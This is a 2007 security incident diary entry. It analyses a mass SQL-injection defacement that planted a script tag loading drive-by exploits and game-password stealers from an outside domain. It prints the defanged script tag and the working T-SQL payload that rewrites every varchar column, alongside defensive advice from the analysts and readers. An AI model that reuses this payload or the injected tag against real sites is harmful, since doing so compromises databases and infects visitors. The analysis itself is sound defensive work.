yl18.net mass defacement

Published: 2007-11-06
Last Updated: 2007-11-07 09:03:51 UTC
by Maarten Van Horenbeeck (Version: 3)
3 comment(s)

Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding that the following script tag (obfuscated) had been injected in over 40 000 pages across the internet, covering around 150 domains which we so far know of.

script src="hXXp://yl 18.net/0.js"

This script generates a page containing several hidden iframe components. These link to other pages that contain browser specific exploit code, such as the common ADODB exploit. This code downloads, without prompting, a small number of executable droppers, and executes them on vulnerable systems.

Upon review, most of the binaries downloaded appeared to be password stealers for online games, but not all have been reviewed yet. Anti virus coverage differed greatly between several binaries. Below is the virustotal output for one sample:

AhnLab-V3 2007.11.7.0 2007.11.06 -
AntiVir 7.6.0.30 2007.11.06 TR/PSW.OnlineGames.gul
Authentium 4.93.8 2007.11.05 -
Avast 4.7.1074.0 2007.11.05 -
AVG 7.5.0.503 2007.11.06 PSW.OnlineGames.QCP
BitDefender 7.2 2007.11.06 Trojan.PWS.Onlinegames.NMG
CAT-QuickHeal 9.00 2007.11.06 TrojanPSW.OnLineGames.gul
ClamAV 0.91.2 2007.11.06 -
DrWeb 4.44.0.09170 2007.11.06 Trojan.PWS.Gamania.5503
eSafe 7.0.15.0 2007.10.28 suspicious Trojan/Worm
eTrust-Vet 31.2.5270 2007.11.05 -
Ewido 4.0 2007.11.06 -
FileAdvisor 1 2007.11.06 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.06 -
F-Secure 6.70.13030.0 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
Ikarus T3.1.1.12 2007.11.06 Trojan-PWS.Win32.OnLineGames.gul
Kaspersky 7.0.0.125 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
McAfee 5157 2007.11.06 -
Microsoft 1.3007 2007.11.06 -
NOD32v2 2641 2007.11.06 -
Norman 5.80.02 2007.11.06 W32/OnLineGames.SPZ
Panda 9.0.0.4 2007.11.06 Suspicious file
Prevx1 V2 2007.11.06 Heuristic: Suspicious File With Persistence
Rising 20.17.12.00 2007.11.06 -
Sophos 4.23.0 2007.11.06 Mal/Packer
Sunbelt 2.2.907.0 2007.11.06 VIPRE.Suspicious
Symantec 10 2007.11.06 Infostealer.Gampass
TheHacker 6.2.9.117 2007.11.06 -
VBA32 3.12.2.4 2007.11.06 -
VirusBuster 4.3.26:9 2007.11.06 Packed/FSG
Webwasher-Gateway 6.0.1 2007.11.06 Trojan.PSW.OnlineGames.gul 

This type of widespread attack can incur a serious toll and requires follow up. At the ISC, we not only try to assess how to have a piece of malicious code taken down, but also what the attacker's next steps will be. We generally take at least the following steps to contain the incident:

  • Inform the ISP hosting the malicious code. In this case, this was CHINANET, who have a massive deployed base and are not always able to respond promptly;
  • If we receive no response or suspect a language issue, we inform the local incident response team (CSIRT/CERT) and ask them for assistance;
  • We gather samples of the affected malicious code and distribute it to anti virus vendors to have them build coverage;
  • If it’s an important issue, we report it here on the diary so organizations can implement controls to protect themselves against infection.

We also assess what the attacker spent most time working on. In this case, compromising a single server in China and hosting a malicious script is low effort and can easily be repeated. Attacking thousands of sites and adding a link to them is his actual investment.

As such, once the server is taken offline, the attacker will promptly move hosting for the yl18.net domain to another server. If the domain is likely fully malicious, we try to pre-empt this and inform the registrar that the domain is used for illegal activities and should be disabled.

This is a problem – most registrars do not really care what a domain is used for. Generally malicious domains are however paid for with fake credit cards, and if this can be identified, they have the legal ability to disable the domain.

These efforts take lots of time, and at this point in time, the server hosting yl18.net is still online and serving malicious code. Various .com web sites have been defaced with the script tag, most likely through SQL injection or cross site scripting, and are infecting their users.

If you have the ability to do so, we suggest blocking traffic to yl18.net at your gateway.

UPDATE:  A reader wrote in with some information on how his site was compromised. He confirmed the SQL injection pathway. Fellow handler Bojan had a look at the SQL statement, which was CAST away as HEX in a variable:

declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script
src="hxxp://yl 18.net/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
set @m=REVERSE(@m)
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);

This code adds the malicious script tag to all user table objects which meet specific criteria (type varchar). It also explains why such a large number of pages per site have been affected.

--
Maarten Van Horenbeeck

Keywords:
3 comment(s)

Comments

FYI, a quick hack for devices like Cisco PIX/ASA (no DNS lookup) is to make an ACL that blocks something like 1.1.1.1 to all on your outbound, then setup the offending domain (in this case, yl18.net) on your internal DNS servers. Make anything at that domain resolve to 1.1.1.1 and not only will it be blocked, but you can have the device write an event any time that ACL is hit.
You might want to check your logs to see if anyone has gone to 125.65.77.25 (where that domain resolves to). We found a few hits to it within the last week and are doing follow-ups.
For those of you who are interested, there was a handler diary back in Feb 6th, 2007 by Donald Smith which talked about an 8.js code-injection/site defacement. www.zj5173.com noted on that diary entry also resolves to the same IP 125.65.77.25.

http://www.dshield.org/diary.html?storyid=2178

Diary Archives